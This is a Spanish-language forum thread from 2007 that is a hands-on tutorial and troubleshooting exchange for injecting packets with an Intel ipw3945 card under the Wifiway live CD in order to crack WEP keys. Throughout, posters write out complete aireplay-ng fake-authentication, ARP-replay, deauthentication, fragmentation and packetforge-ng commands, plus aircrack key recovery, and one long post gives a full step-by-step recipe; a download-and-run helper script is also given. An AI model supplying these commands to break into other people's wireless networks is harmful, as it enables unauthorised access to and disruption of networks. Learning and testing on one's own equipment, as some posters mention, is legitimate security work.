Seguridad Wireless - Wifi
Suite Seguridad Wireless => Manuales de Wifislax & Wifiway => Mensaje iniciado por: hadrianweb en 05-05-2007, 14:57 (Sábado)
-
Video inyeccion ipw3945
Espero que os ayude, y que os guste
Con formato de la web:
http://www.seguridadwireless.net/ipw3945.htm
Sin formato de la web: a fondo completo:
http://www.seguridadwireless.net/ipw3945full.htm
alojado ya en:
http://www./public/wifiway/videos/hadrianweb_ipw3945.swf
(http://www.youimg.net/uploads/70a473845e.png)
En primer luegar abrimos la carpeta /sys/class/net/wifi0/device
Ahi modificamos el rate y lo ponemos a 2
En la misma carpeta modificaremos el archivo que pone bssid y pondremos la mac del ap
tambien modificamos el archivo que pone channel por el canal correspondiente.
Una vez echo esto podremos inyectar tal y como lo hacemos con la demas tarjetas, pero esa vez con una peculiardad y es que para capturar usaremos la rtap0 y para inyectar la interfaz wifi0
La inyeccion seria de la siguiente forma:
Hacemos lo siguiente:
airodump-ng rtap0
Con esto comprobamos cual es el canal de ap a atacar y tambien el bssid luego abrimos otra terminal y con el aireplay-ng hacemos de la siguiente forma:
aireplay-ng -1 0 -e Nombre_del_ap -a mac_del_ap -h mi_mac wifi0
Y en otra terminal distinta hacemos lo siguiente:
aireplay-ng -3 -b mac_del_ap -h mi_mac wifi0
Para finalizar en una terminal abrimos el airodump-ng de la siguinte forma:
airodump-ng rtap0
Con esto lo que nos queda es esprar a que el aireplay-ng coja el arp. Para finalizar lo que tenemos que hacer es
aircrack-ptw archivo.cap
P.D. Recordar levantar la interfaz wifi0 con el comando
ifconfig wifi0 up
----------------------------------------Edito-------------------------------------------
Segun acabo de leer(algo que puso rh3nt0n) el rate tambien se puede modificar con lo siguiente:
Tambien puedes usar lo siguiente:
ifconfig wifi0 down
chmod u+wrx /sys/class/net/wifi0/device/rate
echo 12 >/sys/class/net/wifi0/device/rate
echo <canal> >/sys/class/net/wifi0/device/channel
----------------
Bueno aqui les dejo un script que auntomatiza el proceso de el cambio de canal y rate asi como el del bssid
http://telefonica.net/web2/wifislax/wifiway/ipw3945.sh
P.D.Si les dice algo de permiso denegado, lo unico que tienen que hacer es poner chmod 777 ipw3945.sh
Para ejecutarlo simplemente deben de poner
./ipw3945.sh
Espero que lo disfruten ;D ;D ;D
Directo con shell (terminal)
wget http://telefonica.net/web2/wifislax/wifiway/ipw3945.sh
chmod 777 ipw3945.sh
./ipw3945.sh
Y dejar ese terminal abierto, por si quereis ir haciendo mas cambios, esta script sera añadida en futuras versiones.
-
Gracias campeón, eres el mejor, muchas gracia
;D ;D ;D
PD: ¿Cómo se mi mac?
-
Simplemetnes escribe ifconfig y te la pone (en wifi0 claro esta)
-
Bueno queda editado para el que quiera hacerlo de las dos formas.
Una cosa interesante, para el ataque 1 recordar ponerle despues del 1 los segundos yo lo pongo 0 por que con que se asocie una vez ya es suficiente
-
Manual seguido paso a paso, y nada, leyendo paquetes se queda, lo que he observado es que ahora lee los paquetes mas lento.
hadrianweb, ¿cuanto te tarda en pillar el arp?
Es que cuando me asocio, me da un error, y me dice (en ingles) puede ser por estos motivos: no me acuerdo cuales son
Si alguien pudiera ponerme como conectarme a una red inalambrica mediante (seguramente con comandos), me ahorraría estar entrando y saliendo de windows, para mirar en el foro
Saludos
-
En primer lugar el recuerda que en la asociacion(ataque 1) debes poner ese 0, por que sino a mi tambien me daba el error
En segundo lugar una de las opciones de ese error de be de ser el rate asi que lo que debes hacer es comprobar si el rate esta bien.
Y finalmente, justo despues de empezar a inyectar comprueba que en el archivo bssid tienes la mac correcta y no 00:00:00:00:00
-
Ok, voy a intentarlo de nuevo ;D
Si me sale(o no), tendré que volver a windows para contarlo, ya que no puedo navegar desde wifiway.
Pero la verdad es que me estoy liando con los nombres,¿ bssid es la mac, o station es la mac?
Es que si no tengo estos conceptos claros, poco voy a poder hacer.
Si alguien sabe como conectar, que lo cuente
-
jaja ahora te lo digo
-
La conexion, bueno en esto no me podeis meter la bronca, esos drivers estan como vienen.
Supongo que habra que preguntarlo en:
http://intellinuxwireless.org/
Igual hay que cambiar de forama temporal con esto:
http://intellinuxwireless.org/?p=iwlwifi&n=howto-iwlwifi
-
Hola!! Felicidades por la distribución.
Pero aun no he consigo que me inyecte, he seguido los pasos y se me queda cuando utilizo
aireplay-ng -1 0 -e Nombre_del_ap -a mac_del_ap -h mi_mac wifi0
Me sale sending authentication request todo el rato :(.
He realizado todos los pasos que salen en este post, en cuanto al archivo bssid me extraña q le introdujo la mac del ap, pero luego despues de utilizar este comando pues se me pone a 00:00:... de nuevo.
Aver si alguien me ayuda. Saludos
-
Bueno aqui les dejo un script que auntomatiza el proceso de el cambio de canal y rate asi como el del bssid
http://telefonica.net/web2/wifislax/wifiway/ipw3945.sh
P.D.Si les dice algo de permiso denegado, lo unico que tienen que hacer es poner chmod 777 ipw3945.sh
Para ejecutarlo simplemente deben de poner
./ipw3945.sh
Espero que lo disfruten ;D ;D ;D
-
Hola!! Felicidades por la distribución.
Pero aun no he consigo que me inyecte, he seguido los pasos y se me queda cuando utilizo
aireplay-ng -1 0 -e Nombre_del_ap -a mac_del_ap -h mi_mac wifi0
Me sale sending authentication request todo el rato :(.
He realizado todos los pasos que salen en este post, en cuanto al archivo bssid me extraña q le introdujo la mac del ap, pero luego despues de utilizar este comando pues se me pone a 00:00:... de nuevo.
Aver si alguien me ayuda. Saludos
Si te puso 00:00... pues en medio de la inyeccion cambiala y punto, porque asi es mas seguro
-
Editado, jeje ahora ya tenemos un script que lo hace todo ;D ;D
-
bueno estoy contento por el tema de la ipw3945, los demas temas ya se iran tocando y se corregira lo que pueda para nuevas versiones, no hay prisa.
-
Hola soy nuevo y estoy intentando inyectar con mi ipw3945
Tengo unas dudas, espero que me puedan ayudar a solucionarlas:
1º En donde tengo que guardar ./ipw3945.sh para que me lo encuentre al estar desde wifiway, puesto que lo guarde en un archivo que tengo en windows y cuando entro en wifiway lo ejecuto y me dice q no lo encuentra
2º Cuando modifico los archivos que me manda en el tutorial me dice que no puedo guardarlos. Es debido a que estoy ejecutando desde el live cd?
Espero que me puedan ayudar.
Un saludo y gracias de antemano
-
Bueno en primer lugar el script ya modifica los archivos que dice el tutorial, asi que comencemos por lo del script
Entras en el directorio /mnt/
y ahi veras tus particiones, entras en la de windows y buscas donde te descargaste el archivo
Una vez encontrado, coges y lo copias en /root
Luego simplemente debes de hacer desde la terminal lo siguiente
chmod 777 ipw3945
./ipw3945.sh
-
Gracias voy a intentarlo.
Saludos
-
Llevo una hora con 400000 paquetes enviados y apenas 78 ARP, no se lo q me falta. Tb le cuesta autentificarse. Tengo q hacer varios intentos para q lo haga.
-
Asegurate de que el archivo bssid esta cambiado, por el bssid del ap
-
Acabo de intentar busar en el gestor de ficheros de wifiway y no consigo encontar mis documentos
Te agradecería que me comentases una ubicacion para el archivo q consideres acertada y me puedas decir como acceder a ella, ya te comente antes q no tengo idea de linux y por lo tanto me cuesta encontrar las cosas aunque me gustaría aprender.
Gracias
-
jaja, ok te explico, desde windows te descargas el archivo, en el propio disco duro, sera lo mas facil, es decir en c:/
Luego una vez inicies el wifiway, el quito icono de los que aparece abajo lo abres, si te fijas el icono es una carpeta, te abre una ventana y a la izquierda aparece Sistema de ficheros, pues le das ahi, y luego en el apartado de la derecha pues buscas la carpeta mnt y la abres(con dos clicks) luego abres tu correspondiente particion de windows que puede ser o bien sda o hda u otra, y justo dentro de esa carpeta te tiene que aparece al ipw3945.sh,
entonces lo compias y lo pegas en /root, la carpeta root te aparece a la izquierda tambien
-
Si tienes una tarjeta wifi usb, que tenga el soporte correspondiente, se podria hacer directamente
-
El archivo bssid si lo tengo bien. Lo dejo abierto para asegurarme q no me lo cambie, pero aun asi lo comprobe. Como se prueba otro tipo de ataque por si ve ma mejor??
-
Los ataque son aireplay -1 o -2 o -3 o -4 pero cada uno tiene sus difereciencias, todo es lo puedes encontrar en la pagina pricipal y en otros manuales
-
Bueno tras un fin de semana completo con el video de la inyeccion de la ipw3945 al final lo he conseguido.
Ha costado mucho trabajo.
Video inyeccion ipw3945
Espero que os ayude, y que os guste
Con formato de la web:
http://www.seguridadwireless.net/ipw3945.htm
Sin formato de la web: a fondo completo:
http://www.seguridadwireless.net/ipw3945full.htm
-
pues yo me retiro ya, adios
-
Bueno, y yo tambien me voy ;D ;D
Aqui se queda todo, por lo menos el video a quedado en la pagina y en el manual ;D
-
Probado el chopchop con la ipw y funciona perfectamente, un ataque muy recomendable para hacer cuando el A3 nos falla pero hay station conectada ;D
saludos
-
Hola. pues he seguido los paso y todo bien hasta que hago el ataque 3. he esperado mas de 30min y no me suben los ARP. tengo un data de 40 pero los arp no suben. hay alguna forma de solucionarlo?? el atauqe 1 me funciona y me asocio bien, pero incluso al repetir no suben los ARP. Muchas gracias
-
No se si habras visto el video, pero en el indico que para acelerar el proceso de los arp, utilizo el ataque 0 y luego lo paro, este ultimo paso, el de pararlo es muy importante por que sino no subiran nunca
para ejecutar el ataque 0 utiliza lo siguiente
aireplay-ng -0 30 -a mac_ap wifi0
Para paralo pulsa Ctrl+c
-
Y si fuera WPA?
Edito: Me he leido el foro un rato y por lo que veo es muy dificil sacar una WPA, primero necesitaria la handshake correcto?
Lo que no termino de entender es el cowpatty.
Seria posible con la ipw3945,suponiendo que tengo la clave en un Diccionario.
gracias
Cada vez me estoy acercando mas a linux ;D
-
Si, debes usar un A0 como el que tiene arriba hadrianweb hasta que consigas el handshake y despues pasarle diccionarios como un loco hasta que te la saque...
La verdad es que esta chungo...
Saludos
-
Y para eso supongo que no es necesario cambiar el rate, o si??
-
Perfecto ahora si que se carga la foto inicial.
-
El video publicado de hadrianweb realmente va muy rapido para ver los comandos. Hay alguna manera de hacer que vaya mas lento?
-
Bueno para la inyeccion son los mismo que el del manual, y ademas acelero el proceso de coger arp con el ataque 0, que se realiza de la siguiente forma
aireplay-ng -0 30 -a mac_ap wifi0
Pero recuerda para este ataque con el ctrl+c por que sino no subiran los arp
-
No entiendo muy bien esto dle ctrl + c.....
Otra cosa: Si no se publica el ssid de la red como podemos forzar a que el AP nos lo diga?[
-
jeje ctrl + c es pulsar la tecla control + c, que sirve para detener un proceso ;D ;D
-
No entiendo muy bien esto dle ctrl + c.....
Otra cosa: Si no se publica el ssid de la red como podemos forzar a que el AP nos lo diga?[
aunque este oculto, siempre es visible en el momento en que cliente y punto de acceso se autentifica.
Te lo da el airodump-ng y el kismet, este ultimo en azul. Asi pues si se prodice en ese momento, la deduccion es logica, si bien no me gusta hablar de ese tipo de ataque, porque lo considero el de todos el menos etico si no es el equipo de uno mismo.
Aun asi, existe definido como ataque 0, y espero y deseo que solo lo uses con tus propios equipos.
https://hwagm.elhacker.net/htm/traduccion.htm
Ataque 0: desautenticación
Este ataque es probablemente el más útil para recuperar un ESSID oculto (no difundido) y para capturar "saludos" WPA forzando a los clientes a reautentificarse. También puede ser usado para generar peticiones ARP en tanto que los clientes Windows a veces vacían su cache de ARP cuando son desconectados. Desde luego, este ataque es totalmente inservible si no hay clientes asociados
y que el socio me perdone. :-[
pd: obvia la palabra wpa.
-
No pasa nada, y es que yo utilizo ese ataque contra mi propio router.
P.D. No sabia que bitelchus se referia a eso ;D
-
no me quedo muy claro... eh leido el enlace y el post de hwagm, pero no entendi tal ves como hacer para obterer el SSID :S... cuando lo probe en mi AP en un momento no lo veia pero de golpe aparecio el SSID que supuestamente deberia estar oculto, mi pregunta es si hay alguna manera de obtener o desocultar el SSID y no esperar a tener un golpe de suerte
-
con una desautentificacion, ya te he contestado en el otro hilo ... ;D
-
Hola a todos y enhorabuena por el curro y el aprendizaje de otros, buen equipo.
Oye tambien quiero haceros una pregunta, como puedo grabar el video de hadrianweb para verlo cuando esté en casa?
-
si tiens mozzilla bajate un plugin que hay para descargar videos, hasta lo podras hacer de youtube.
Yo lo hice :)
-
tambien puedes utilizar cualquier gestor de descargas y descargarlo al pc
-
HOLA MUCHO GUSTO. MI PREGUNTA ES LA SIGUIENTE:
EH VISTO EN SU PAGINA QUE SE PUEDE INYECTAR TRAFICO Y CAPTURAR CON LA TARJETA IPW3945 EH VISTO TAMBIEN QUE EN LA LISTA DE TARJETAS APARECE Y LA RECOMIENDAN MUCHO, ME GUSTARIA SABER DE ALGUIEN QUE HAYA INTENTADO EN INYECTANDO OH CAPTURANDO PAQUETES QUE TAN FUNCIONAL ES EN LA VELOCIDAD DE CAPTURA Y INYECCION. SE LOS AGRADECERIA MUCHO.ESPERO ME DISUCLPEN SI ACASO MOLESTE DE ALGUN MODO AL ESCRIBIR ESTAS LINEAS.
-
no molestan , pero para laproxima en minusculas por favor, en internet, escribir en mayusculas es como gritar, pero supongo eso no lo sabias
-
Hola.... quisiera preguntarte amigo hadrianweb sobre el tema del script, si es posible copiarlo o añadirlo a la iso y luego quemar la live d nuevo, para no tener q andar buscando el disco duro.
luego otra cosita, cuando se genera el archivo cap, éste se graba fisicamente en el disco duro, o el propio proceso lo lee automaticamente, o se tiene q ir a buscar al disco..... igual estoy diciendo una tonteria.
salu2.
-
Esa script ya la lleva la nueva wifiway-0.6.iso
Las capturas no se graban en el hdd, sino en memoria, a menos que las grabes en la partcion de windows o en un pendrive
-
Gracias Hwagm x responder.... entonces si no lo he entendido mal. cuando carga en modo terminal tipo windows, en una ventana escribo...
chmod 777 ipw3945
./ipw3945.sh
y entonces se carga la script.....no
-
jeje, se supone que ya tienes los permisos, y ya esta en /bin o /sbin lo que significa que no es necesario tanto trabajo simplemente pon lo siguiente
ipw3945.sh
-
Me puede alguien indicar donde estal mal el proceso o q pueder ser el fallo. Despues d lanzar el script y poner los datos... este seria el orden.
>1terminal
canal = 6 , rate = 2 , bssid = mirouter
>2terminal
airodump-ng -w nombre rtp0 (corriendo)
>3terminal
aireplay-ng -3 -b mirouter -h portatil -x 1024 wifi0 (corriendo)
Esto sale : mas d 5 minutos
read 159513 packets ( got 97 ARP requests)
sent 130908 packets (69 pps)
>4terminal (tambien lo he puesto y quitado)
aireplay-ng -0 30 -a mirouter
>5terminal
aircrack-ptw nombre.cap
Esto sale :
Allocating a new table
bssid = mirouter keyindex=0
stats for bssid mirouter keyindex=0 packets=8
y nada mas...
luego veo q el archivo cap me lo pone él, con este nombre...
replay_arp-0524-200051.cap
salu2
-
pues te falta el ataque 1 que es para asociarte al ap
-
a disculpa...t refieres a este :
aireplay-ng -1 0 -e DLINK -a mirouter -h portatil wifi0
esto tambien lo he echo.
-
hadrian me ha gustado mucho el video................ ;)
mu bueno........
p.d. gracias por la dedicatoria...........;)
-
a disculpa...t refieres a este :
aireplay-ng -1 0 -e DLINK -a mirouter -h portatil wifi0
esto tambien lo he echo.
Mira el problema ya se cual es, si te fijas te pone 97 arp request, y debes tener mas por lo que tienes que esperar mas, lo de los 5min depende de muchos factores, pero, a ti cuando te ponga 50000 datas puedes pararlo y mirar y si no te va con eses ivs pues pruebas con mas ;D ;D
-
no hace falta pararlo...................sino luego toca usar emergecap
-
Denada *dudux, es lo cierto, me habeis ayudado mucho, y por lo tanto queria agradeceroslo ;) ;)
-
Hola a todos, ante todo felicitarles por esta gran web :)
Estaba documentándome un poco sobre este tema y decidí probar probar este ataque contra el router de mis vecinos, que son amigos mios y por supuesto no hay problema :)
La cosa es que cuando llego a la parte de ejecutar el aireplay para aumentar el tráfico, el programa rompe tal que así:
benihana:/home/javi# aireplay-ng -3 -b 00:02:6F:31:2B:42 -h 00:30:CD:00:00:09 eth1
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211
or ARPHRD_IEEE80211_PRISM instead. Make sure RFMON is enabled:
run 'ifconfig eth1 up; iwconfig eth1 mode Monitor channel <#>'
Sysfs injection support was not found either.
Hasta ahí supuse que sería algún problema de mi tarjeta respecto al tema de inyectar paquetes, por lo que decidí bajar el scrip de hadrianweb para mi intel pro wireless 3945ABG, pero la cosa es que mi tarjeta tiene como nombre de interfaz eth1 en vez de wifi0, por lo que traté de modificar el script sustituyendo wifi0 por eth1 en todas las instrucciones, lo que me devolvió los siguientes errores:
Por favor introduce el canal para la wifi0
2
Indique el rate de captura
2
Indique el bssid para el asociado, separado por puntos (Ej: 00:11:22:33:44:55)
00:30:CD:00:00:09
chmod: no se puede acceder a «/sys/class/net/eth1/device/rate»: No existe el fichero o el directorio
./ipw3945.sh: line 20: /sys/class/net/eth1/device/rate: Permiso denegado
./ipw3945.sh: line 21: /sys/class/net/eth1/device/channel: Permiso denegado
./ipw3945.sh: line 22: /sys/class/net/eth1/device/bssid: Permiso denegado
La cosa es que dichas carpetas o archivos no existen... ¿ Me falta algún paquete por instalar en mi sistema o algo así?
Muchas gracias de antemano por la ayuda ofrecida con este gran tutorial y por leer mis estúpidas preguntas xDD
Un saludo y nos leemos pronto!!! :D
-
Hola amigos!!!
A mi tambien me da problemas es script.
Cuando lo ejecuto me dice que no encuentra los archivos rate, channel y bssid.
he mirado a ver si estan esos archivos y efectivamente no estan.
Dentro del directorio /sys/class/net/ tengo los directorios ath0, ath1, wifi0 y eth1 (es decir uno por interface)
Pues no encuentro esos archivos dentro de ninguna interfaz...
He probado a crearlos manualmente dentro de /sys/class/net/ath1/device y no hay manera, no me deja.
PD: uso la interfaz ath1 para sniffar, la creo con wlanconfig en modo monitor, es la unica manera que tengo de poner la tarjeta de red en modo monitor.
Alguien me puede ayudar??
Gracias.
-
Hola amigos!!!
A mi tambien me da problemas es script.
Cuando lo ejecuto me dice que no encuentra los archivos rate, channel y bssid.
he mirado a ver si estan esos archivos y efectivamente no estan.
Dentro del directorio /sys/class/net/ tengo los directorios ath0, ath1, wifi0 y eth1 (es decir uno por interface)
Pues no encuentro esos archivos dentro de ninguna interfaz...
He probado a crearlos manualmente dentro de /sys/class/net/ath1/device y no hay manera, no me deja.
PD: uso la interfaz ath1 para sniffar, la creo con wlanconfig en modo monitor, es la unica manera que tengo de poner la tarjeta de red en modo monitor.
Alguien me puede ayudar??
Gracias.
-
Hola Southern,
yo no se mucho pero...
me parece que para empezar estas utilizando la interfaz incorrecta no?
si haces un iwconfig a secas, te dice que eth1 es una interfaz wireless?
Normalmente esa es la ethernet.
PD: Perdon por duplicar el mensaje anterior.
-
Chucki la interfaz que tienes que utilizar es rtap0 y wifi0 esta ultima para la inyeccion, y no la ath0 o ath1 como tu dices
-
Hola Hadrianweb,
la interfaz rtap0 no me sale, la wifi0 sí.
Pero el caso es que dentro del directorio /sys/class/net/wifi0/device no tengo los archivos channel, bssid y rate.
Porque no los tengo??
-
1º) Porque no tienes bien cargado el live cd, probable consecuencia de un mal grabado (lo mas seguro)
2º) Porque tienes desactivada la tarjeta wifi, es decir, dale al botoncito del portatil con el cual la activas
-
Hola.....disculpa hadrianweb pero he estado fuera y no he podido probar lo q me indicaste. Hoy he realizado las pruebas.....y como bien me digiste lo he dejado subir mas los ARP, y lo resultados siguen igual.
1ª Hora corriendo :
read 220.300 packets (got 155 ARP) 37 pps (archivo.cap - 22 mb)
2ª Hora corriendo :
read 232.500 packets (got 162 ARP) 37 pps (archivo.cap - 28 mb)
3ª Hora corriendo :
read 300.000 packets (got 175 ARP) 37 pps (archivo.cap - 41 mb)
al lanzar el aircrack, lo unico q varia son los packets, lo demas esta todo igual.
1. 1900
2. 2474
3. 2597
Otra cosa queria preguntarte....al definir el archivo cap en el airodump hay q poner o es necesario el parametro IVS.
Luego en la carga del live aparece este error....
mount cánt sys / etc / fsbab or etc / mtb ( failed )
Puede estar relacionado ? q puede ser.
salu2.
-
No el error ese que dices no se debe a eso.
Y se supone que lo estas haciendo bien, lo que ocurre es que no te inyecta muy rapido ;D ;D
-
ya...entonces, q significa y q puedo hacer para solucionarlo. Xq la tarjeta del portatil no creo q este mal, aún asi, hay alguna forma d realizarla algún tipo d test d verificación.
salu2.
-
Una cosa es probable que no esteas bien auntentificado comprueba eso
-
perdoname hadrian.....pero estoy totalmente desorientado y confuso, ya no se q mas hacer. Me podrias indicar como hacerlo.
T agradezco d antemano tu preciada ayuda.
-
Pues mira este es el comando
aireplay-ng -1 30 -e Nombre_del_ap -a mac_del_ap -h mi_mac wifi0
So te funciona debe de aparecete una cara asi :-) sino puede significar que el rate no estra cambiado o que estas muy lejos del ap, o que el router no es vulnerable a ese ataque ...etc
-
Hola d nuevo..... esto cada vez es mas raro....t pongo los pasos q hago.
1. En el arranq he puesto los 3 tipos d teclados o juego d caracteres.
2.entro con startx
3. abro terminal :ipw3945.sh
canal 6 - rate 2 - bssid
4. airodump-ng -c 6 -w nombre rtap0 ......dejo corriendo
5.aireplay-ng -1 0 -a bssid -h mimac -e essid wifi0.....dejo abierto
con este el resultado es el siguiente :
hora : waiting for beacon frame (BSSID : xx:xx:xx:....)
hora : sending authentication request
hora : authentication successful
hora . sending assocciation request
hora : association successful :-)
6.aireplay-ng -3 -b bssid -h mimac wifi0.......dejo corriendo
7.aircrack-ptw nombre-01.cap
esto aparece
allocating a new table
bssid = xx:01 (mia) keyindex=0
allocating a new table
bssid = xx:02 keyindex=0
allocating a new table
bssid = xx:03 keyindex=0
stats for bssid xx:01 keyindex =0 packects=1155
stats for bssid xx:02 keyindex =0 packects=34
stats for bssid xx:03 keyindex =0 packects=1
ahora el q me digsite tu...
aireplay-ng -1 30 -a bssid -h mimac -e essid wifi0.....dejo abierto
con este el resultado es el siguiente :
hora : waiting for beacon frame (BSSID : xx:xx:xx:....)
hora : sending authentication request
hora : authentication successful
hora . sending assocciation request
hora : association successful :-)
hora :sending keep alive packet
sending authentication request
sending authentication request
sending authentication request
sending authentication request
ahi se queda....... el Ap esta a unos 5 metros.
-
como lo hacias esta correctoHola d nuevo..... esto cada vez es mas raro....t pongo los pasos q hago.
1. En el arranq he puesto los 3 tipos d teclados o juego d caracteres.
2.entro con startx
3. abro terminal :ipw3945.sh
canal 6 - rate 2 - bssid
4. airodump-ng -c 6 -w nombre rtap0 ......dejo corriendo
5.aireplay-ng -1 0 -a bssid -h mimac -e essid wifi0.....dejo abierto
con este el resultado es el siguiente :
hora : waiting for beacon frame (BSSID : xx:xx:xx:....)
hora : sending authentication request
hora : authentication successful
hora . sending assocciation request
hora : association successful :-)
6.aireplay-ng -3 -b bssid -h mimac wifi0.......dejo corriendo
7.aircrack-ptw nombre-01.cap
esto aparece
allocating a new table
bssid = xx:01 (mia) keyindex=0
allocating a new table
bssid = xx:02 keyindex=0
allocating a new table
bssid = xx:03 keyindex=0
stats for bssid xx:01 keyindex =0 packects=1155
stats for bssid xx:02 keyindex =0 packects=34
stats for bssid xx:03 keyindex =0 packects=1
Aparentemente esto esta correcto, solo comprueba una cosa, si hal cambiar el rate canal y demas estos estan cambiados correctamente
-
Antes que nada gracias a los que han puesto tiempo en darle soporte a wifi way wifislax y de alguna forma contribulleron a los manuales hallados en estos foros.
Los manuales estan muy buenos pero en mi caso ocurrio algo interesante que me hizo la vida imposible al intentar conseguir un WEP key: no habian clientes conectados y aun con la falsa autenticacion no subian los ARP. Pongo esto aqui por si alguien le ocurre lo mismo. Lo que pongo a continuacion es una aplicacion/remix del conocimiento posteado aqui y otras web y para algunos os parecera obvio; pero tiene algunos pasos extra para los que tengan mi problema de falta de injeccion. Mi OS es WIN XP y uso live CD. Asumo que el AP tiene WEP open y vosotros usuais tarjeta wifi ipw3945 :-P.
Primeramente, utilize la version 0.4 de wifiway. la 0.6 salio JUSTO cuando acababa de bajar la 0.4 se me acabaron los discos en blanco para colmo>.>
NOTA:yo me mate buscando info por ahi y luego me entero que en esta live CD NO HAY QUE PONER LA TARJETA EN MODO MONITOR. Se hace automaticamente.
En la version 0.6 imagino que los primeros 3 pasos no se necesitan(excepto poner el live cd DUH :-P).
I. Desde windows correr netstumbler. Es super rapido y dummy friendly para hallar AP's y BSSID's. Es mi preferencia, si no os gusta usad lo que querais y pasad trabajo :-).
II. Poner ipw3945.sh en el directorio raiz, usualmente C. Poner live CD y dar restart.
III. Una vez en linux abrir el explorador de archivos y buscar el folder /mnt/ y una de esas va a ser la particion de windows. Dar copy al ipw3945.sh y paste en /root.
->NOTA: talvez muchos sepan esto pero yo no hasta hace un dia, asi que aqui os va: en el folder /mnt/ pueden haber varias particiones (incluyendo USB drives me imagino). En mi caso puedo dar copy a cosas de windows pero no puedo paste cosas de linux a esa particion. Si han comenzado el proceso de obtener IV's y se han quedado a mitad pueden darle copy a los .cap y .ivs y otras cosas que hayan creado en linux a uno de esas particiones. Ademas pueden grabar desde windows los tutoriales con "save as web page," abrir firefox, arrastralos a la ventana y verlos desde linux.
IV. Abrir un terminal y escribir chmod 777 ipw3945.sh <dar enter> luego escriba ./ipw3945.sh y ponga la info que le pida.
V. Escriba en la consola:
aireplay-ng -1 0 -e NOMBRE_DEL_AP -a MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA wifi0
O si esto no trabaja bien
aireplay-ng -1 6000 -o 1 -q 10 -e NOMBRE_DEL_AP -a MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA wifi0
-Vuestro MAC se consigue escribiendo en un terminal /ifconfig -a
-Este ataque puede fallar de la primera asi que intente varias veces. En mi caso falla si hay un cliente externo conectado. Aveces un buen reboot a tu maquina ayuda si no funciona.
VI. en otra consola:
airodump-ng -w --ivs cap rtap0
-Cap es el nombre que prefieran para guardar data capturada
VII. en otra consola:
aireplay-ng -3 -b MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA wifi0
Con solo esto puede que le injecte. Ese no fue mi caso asi por eso viene lo siguiente:
VIII. Este paso puede ser hecho de la forma A o B. Aun con el mismo AP aveces funciona el A aveces el B. Usad uno de los dos si AL FINAL no trabaja, dar reboot y use el otro(el reboot es pq despues del procedimiento los drivers aveces no responden como uno quiere y no ataca bien) :
A. En otra consola:
aireplay-ng -5 -b MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA wifi0
-ESPERE un par de minutos a que esto termine. Escriba Y (de yes) al la pregunta que le van a hacer y espere a que cree un archivo .xor ->Apunte el nombre
B. En otra consola EN LUGAR del paso A:
aireplay-ng -4 wifi0 -h MAC_DE_VUESTRA TARRJETA
-este ataque aveces no funciona con el -h. Usted experimente.
-ESPERE un par de minutos a que esto termine. Escriba Y (de yes) al la pregunta que le van a hacer y espere a que cree un archivo .xor ->Apunte el nombre
>Anotar de estos pasos nombre de archivo con nombres de este tipo: replayX.cap la parte de X usualmente es un numero. Sustituyalo por el que aplique a su caso
>Una ALTERNATIVA al VIIIB si ya tiene un archivo replay*.cap de una ocacion anterior es
aireplay-ng -4 wifi0 -h MAC_DE_VUESTRA TARRJETA -r replayX.cap
-donde X son unos numeros. Sustituyalo de acuerdo a su caso.
IX. en otra consola:
packetforge-ng -0 -a MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA -k 255.255.255.255 -l 255.255.255.255 -y fragmentX.xor arpZ
>la x puede ser cualquier cosa fijarse en los archivos creados por el paso anterior
> esto es una L minuscula no e confundan-l
> arpZ puede ser lo que quieran, pero no olviden el nombre
>los ip que se muestran NO LOS CAMBIEN; la mayoria de los AP no tienen problema con ellos
X. Presionar las teclas ctrl C en la consola que tiene corriendo al airodump(amenos que usted vea que le esta injectando pero los dudo). Ejecute este nuevo comando:
airodump-ng -c X -bssid MAC_DEL_AP --ivs -w capture rtap0
>el nombre capture lo escojen ustedes pero capture suena bien :P
XI. En otra consola (use la que corri el ataque -1, que estaba abierta) escriba:
aireplay-ng -2 -r arpZ TARRJETA wifi0
>la ventana del paso VII debe estar mostrando como suben los ARP, en mi caso promedio de 400 data/segundo :-D, si no es asi recomiendodar reboot e intentar denuevo sustituyendo el paso VIII A por el B o viceversa o tratar luego. Esto a mi NO me funciona si hay algun cliente conectado aparte del fake auth del ataque -1. Un ataque -0 os puede da~ar el procedimiento asi que no lo hagais :-P.
XII. ejecuten en otra consola:
aircrack-ng *.cap X.ivs -b MAC_DEL_AP
> -b MAC_DEL_AP no es necesariopero aveces no me funciona sin el :-S
>la parte de *.cap la poneis tal como esta con el * per el X.ivs depende del el o los archivos que crearonen los pasos anteriores. Ademas el sistema cambia los nombres, usualmente capture se va a llamar capture-01.ivs o algo asi. Por eso recomiendo ir al /root y ver todos los archivos nombrados <lo que sea>.IVS y a~adirlo al codigo en lugar de X.ivs. Cabe notar que si hay mas de 1 pueden poner todos losque quieran ej X.ivs y.ivs z.ivs pero no acepta *.ivs a diferencia del *.cap que si lo acepta
>si han hecho todo bien al aircrack le deben estar subiendo los IV a monton, asi que esperad, Yo necesite 700,000 IV's y el WEP key era solo de 64 bit y tardo 10 minutos en colectarlos, asi que no se desesperen.
-
Porque no conseguo la autenticacion con el BSSID?
-
no lo logro....como puedo hacer eso q dices para comprobar el rate, canal y demas. Y sobre todo en q paso. perdona pero estoy desesperado.
salu2.
-
excelente manual, ahora nada mas falta crear un isntalador de wifiway para que no se use siempre como live cd :P
saludos y rgacias por tal regalo! ;D
-
alberion. Bueno se hace todo lo posible ;D ;D
kuasha. Para comprobar el rate, bssid y chabnnel entras en la carpeta
/sys/class/net/wifi0/device
Y ahi lo puedes ver
-
Buenas a todos, queria hacer una pregunta:
Me he dispuesto a empaparme de información acerca de todo esto, ya entiendo perfectamente todos los comandos y demas, me dispongo a coger mi router, ponerle un password (el cual yo se) en intento desde el portatil con la tarjeta 3945abg desencrptarla, pero e seguido al milimetro el videomanual de hadrianweb y nada, no me captura ningun arp, si sirve de algo he usado el script envia un monton de bracom (perdonad si no lo escribo bien esque de memoria no se) y lo he dejado una hora y media y nada no sube nada,
p.d.: el portatil esta a 1metro del router.
¿que puedo hacer? hecharme una mano, se me olvidaba al router lo inyecto ya que nadie ay conectado a esa red inalambrica, muchas gracias de antemano y un saludo, espero respuestas.
-
Como ya hemos dicho muchas veces, quizas el problema no sea tuyo, cada router es un mundo.
Comprueba que te autentificas, ya que sino mal vamos, luego recuerda bajar el rate
-
